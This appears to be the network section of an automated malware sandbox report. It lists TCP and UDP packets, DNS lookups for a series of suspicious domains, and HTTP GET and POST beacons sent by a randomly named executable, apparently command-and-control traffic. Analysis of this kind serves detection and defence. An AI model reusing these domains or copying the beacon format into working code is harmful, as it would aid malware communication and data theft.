                      Sep 22, 2024 18:03:37.208246946 CEST8049754208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.219106913 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:38.224162102 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.224239111 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:38.236916065 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:38.241770983 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.778795004 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:38.778876066 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:39.750215054 CEST4975580192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:39.755253077 CEST8049755208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.765402079 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:40.770468950 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.770575047 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:40.783293962 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:40.788301945 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788311005 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788333893 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788337946 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788409948 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788419962 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788448095 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788451910 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:40.788574934 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:41.308537960 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:41.308651924 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:42.293414116 CEST4975680192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:42.298356056 CEST8049756208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:43.312005043 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:43.316934109 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:43.317135096 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:43.325685978 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:43.330526114 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.826951027 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.827187061 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.827228069 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.827292919 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.827982903 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.828035116 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.828171968 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.828921080 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.829050064 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.869522095 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.869647980 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.869688034 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.869719982 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.870237112 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.870275974 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.870296001 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.870312929 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.870362043 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.912373066 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.912512064 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.912647009 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.914170980 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.914447069 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.914483070 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.914508104 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.915319920 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.915378094 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.955336094 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.955579042 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.955616951 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.955636024 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.956376076 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.956425905 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.956444025 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.996479988 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.997827053 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.997934103 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998038054 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.998071909 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998509884 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998564005 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.998583078 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998619080 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:03:59.998661995 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:03:59.999614954 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040656090 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040725946 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.040800095 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040817976 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.040860891 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.041524887 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.041695118 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.041742086 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.042090893 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042104959 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042126894 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042161942 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.042857885 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.042901993 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.083365917 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.083484888 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.083523989 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.083561897 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.084067106 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084098101 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084136963 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.084626913 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084665060 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.084685087 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.085575104 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.085591078 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.085623980 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.137098074 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.320602894 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.320738077 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.320750952 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.320874929 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:00.321266890 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:00.321317911 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:04.881823063 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:04.881859064 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:04.882123947 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:04.887233019 CEST4975780192.168.2.4208.91.197.27
                      Sep 22, 2024 18:04:04.892035007 CEST8049757208.91.197.27192.168.2.4
                      Sep 22, 2024 18:04:10.475509882 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:10.480351925 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:10.480412960 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:10.490864038 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:10.495795965 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:11.273576975 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:11.273637056 CEST8049758195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:11.275460958 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:11.996570110 CEST4975880192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.019972086 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.033032894 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.034755945 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.046003103 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:13.052890062 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.853189945 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.853341103 CEST8049759195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:13.853512049 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:14.559190035 CEST4975980192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.579989910 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.585352898 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.586123943 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.598016024 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:15.610426903 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610440969 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610450983 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610538960 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610553026 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610761881 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610796928 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610812902 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:15.610991955 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:16.345988989 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:16.346173048 CEST8049760195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:16.346223116 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:17.108011961 CEST4976080192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.125699043 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.259583950 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:18.259680986 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.267949104 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:18.273495913 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:19.030797958 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:19.032279015 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:19.036132097 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:19.040055990 CEST4976180192.168.2.4195.161.68.8
                      Sep 22, 2024 18:04:19.044955969 CEST8049761195.161.68.8192.168.2.4
                      Sep 22, 2024 18:04:24.255525112 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:24.281673908 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:24.281744957 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:24.297266960 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:24.317564011 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260416985 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260729074 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260740042 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.260844946 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:25.261538029 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.261547089 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.261559963 CEST8049762194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:25.261625051 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:25.261625051 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:25.812207937 CEST4976280192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.838787079 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.844306946 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:26.844592094 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.854497910 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:26.859433889 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.533940077 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534173965 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534192085 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534231901 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:27.534605980 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534616947 CEST8049763194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:27.534687996 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:28.356008053 CEST4976380192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.374455929 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.379312992 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.380081892 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.391489029 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:29.396368980 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396390915 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396394968 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396451950 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396456003 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396543980 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396548033 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396559000 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:29.396586895 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.089948893 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090130091 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090140104 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090177059 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:30.090668917 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.090706110 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:30.226382017 CEST8049764194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:30.226443052 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:30.903126955 CEST4976480192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.922801971 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.929419994 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:31.932044029 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.940951109 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:31.950659990 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644238949 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644359112 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644376993 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.644463062 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.645004988 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.645026922 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.645056963 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.645962954 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.645987034 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.646011114 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.647017956 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647046089 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647063971 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647080898 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.647111893 CEST8049765194.58.112.174192.168.2.4
                      Sep 22, 2024 18:04:32.647166014 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.651544094 CEST4976580192.168.2.4194.58.112.174
                      Sep 22, 2024 18:04:32.656508923 CEST8049765194.58.112.174192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 22, 2024 18:02:23.556162119 CEST4994353192.168.2.41.1.1.1
                      Sep 22, 2024 18:02:24.015682936 CEST53499431.1.1.1192.168.2.4
                      Sep 22, 2024 18:02:40.095036030 CEST6030353192.168.2.41.1.1.1
                      Sep 22, 2024 18:02:40.552324057 CEST53603031.1.1.1192.168.2.4
                      Sep 22, 2024 18:02:54.609678030 CEST5480753192.168.2.41.1.1.1
                      Sep 22, 2024 18:02:54.689343929 CEST53548071.1.1.1192.168.2.4
                      Sep 22, 2024 18:03:08.375080109 CEST5957253192.168.2.41.1.1.1
                      Sep 22, 2024 18:03:08.533554077 CEST53595721.1.1.1192.168.2.4
                      Sep 22, 2024 18:03:21.891185999 CEST5639753192.168.2.41.1.1.1
                      Sep 22, 2024 18:03:21.979671955 CEST53563971.1.1.1192.168.2.4
                      Sep 22, 2024 18:03:35.391431093 CEST6015653192.168.2.41.1.1.1
                      Sep 22, 2024 18:03:35.676214933 CEST53601561.1.1.1192.168.2.4
                      Sep 22, 2024 18:04:09.891983986 CEST6124353192.168.2.41.1.1.1
                      Sep 22, 2024 18:04:10.472779036 CEST53612431.1.1.1192.168.2.4
                      Sep 22, 2024 18:04:24.146512985 CEST6422753192.168.2.41.1.1.1
                      Sep 22, 2024 18:04:24.251964092 CEST53642271.1.1.1192.168.2.4
                      Sep 22, 2024 18:04:38.577908993 CEST6199253192.168.2.41.1.1.1
                      Sep 22, 2024 18:04:38.850117922 CEST53619921.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 22, 2024 18:02:23.556162119 CEST192.168.2.41.1.1.10xb62dStandard query (0)www.tmstore.clickA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:02:40.095036030 CEST192.168.2.41.1.1.10x1d3bStandard query (0)www.wdeb18.topA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:02:54.609678030 CEST192.168.2.41.1.1.10xeabStandard query (0)www.2bhp.comA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:03:08.375080109 CEST192.168.2.41.1.1.10xcf3aStandard query (0)www.uburn.xyzA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:03:21.891185999 CEST192.168.2.41.1.1.10x89afStandard query (0)www.sppsuperplast.onlineA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:03:35.391431093 CEST192.168.2.41.1.1.10x3167Standard query (0)www.palcoconnector.netA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:04:09.891983986 CEST192.168.2.41.1.1.10xa8fdStandard query (0)www.trapkitten.websiteA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:04:24.146512985 CEST192.168.2.41.1.1.10x9ca6Standard query (0)www.albero-dveri.onlineA (IP address)IN (0x0001)false
                      Sep 22, 2024 18:04:38.577908993 CEST192.168.2.41.1.1.10x885aStandard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 22, 2024 18:02:24.015682936 CEST1.1.1.1192.168.2.40xb62dNo error (0)www.tmstore.clickdns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                      Sep 22, 2024 18:02:24.015682936 CEST1.1.1.1192.168.2.40xb62dNo error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:02:24.015682936 CEST1.1.1.1192.168.2.40xb62dNo error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:02:24.015682936 CEST1.1.1.1192.168.2.40xb62dNo error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:02:40.552324057 CEST1.1.1.1192.168.2.40x1d3bNo error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                      Sep 22, 2024 18:02:40.552324057 CEST1.1.1.1192.168.2.40x1d3bNo error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:02:54.689343929 CEST1.1.1.1192.168.2.40xeabNo error (0)www.2bhp.com81.88.63.46A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:03:08.533554077 CEST1.1.1.1192.168.2.40xcf3aNo error (0)www.uburn.xyz67.223.117.189A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:03:21.979671955 CEST1.1.1.1192.168.2.40x89afNo error (0)www.sppsuperplast.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                      Sep 22, 2024 18:03:21.979671955 CEST1.1.1.1192.168.2.40x89afNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                      Sep 22, 2024 18:03:21.979671955 CEST1.1.1.1192.168.2.40x89afNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:03:35.676214933 CEST1.1.1.1192.168.2.40x3167No error (0)www.palcoconnector.net208.91.197.27A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:04:10.472779036 CEST1.1.1.1192.168.2.40xa8fdNo error (0)www.trapkitten.website195.161.68.8A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:04:24.251964092 CEST1.1.1.1192.168.2.40x9ca6No error (0)www.albero-dveri.online194.58.112.174A (IP address)IN (0x0001)false
                      Sep 22, 2024 18:04:38.850117922 CEST1.1.1.1192.168.2.40x885aNo error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                      Sep 22, 2024 18:04:38.850117922 CEST1.1.1.1192.168.2.40x885aNo error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.tmstore.click
                      • www.wdeb18.top
                      • www.2bhp.com
                      • www.uburn.xyz
                      • www.sppsuperplast.online
                      • www.palcoconnector.net
                      • www.trapkitten.website
                      • www.albero-dveri.online

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973654.179.173.60801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:24.047411919 CEST479OUTGET /pk64/?4rl8h=D2L+4j8Jfvzl8MUfQ9khdgsUc3RmXuRTEOKFuX1NYvsOSSQcePjFDW5WJ5RMGSKYSsEK0HwMz36kWpHuw/f75AJHHPht/yIbLRYuc71CiG5Lg6cOqhMe3mM=&CfmHC=h4QXpn780jb HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Host: www.tmstore.click
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                      Sep 22, 2024 18:02:25.043641090 CEST509INHTTP/1.1 301 Moved Permanently
                      Server: openresty
                      Date: Sun, 22 Sep 2024 16:02:24 GMT
                      Content-Type: text/html
                      Content-Length: 166
                      Connection: close
                      Location: https://www.tmstore.click/pk64/?4rl8h=D2L+4j8Jfvzl8MUfQ9khdgsUc3RmXuRTEOKFuX1NYvsOSSQcePjFDW5WJ5RMGSKYSsEK0HwMz36kWpHuw/f75AJHHPht/yIbLRYuc71CiG5Lg6cOqhMe3mM=&CfmHC=h4QXpn780jb
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.449738206.119.82.147801904C:\Program Files (x86)\uiidxIfzheoDFuIYyBeBTrJQDpLQHPAvtgdGNckLMIdZJZAujrRju\pSySrLvnviNdEH.exe
                      TimestampBytes transferredDirectionData
                      Sep 22, 2024 18:02:40.616561890 CEST734OUTPOST /66vh/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Host: www.wdeb18.top
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 202
                      Connection: close
                      Cache-Control: no-cache
                      Origin: http://www.wdeb18.top
                      Referer: http://www.wdeb18.top/66vh/
                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SAMSUNG-SGH-I747 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
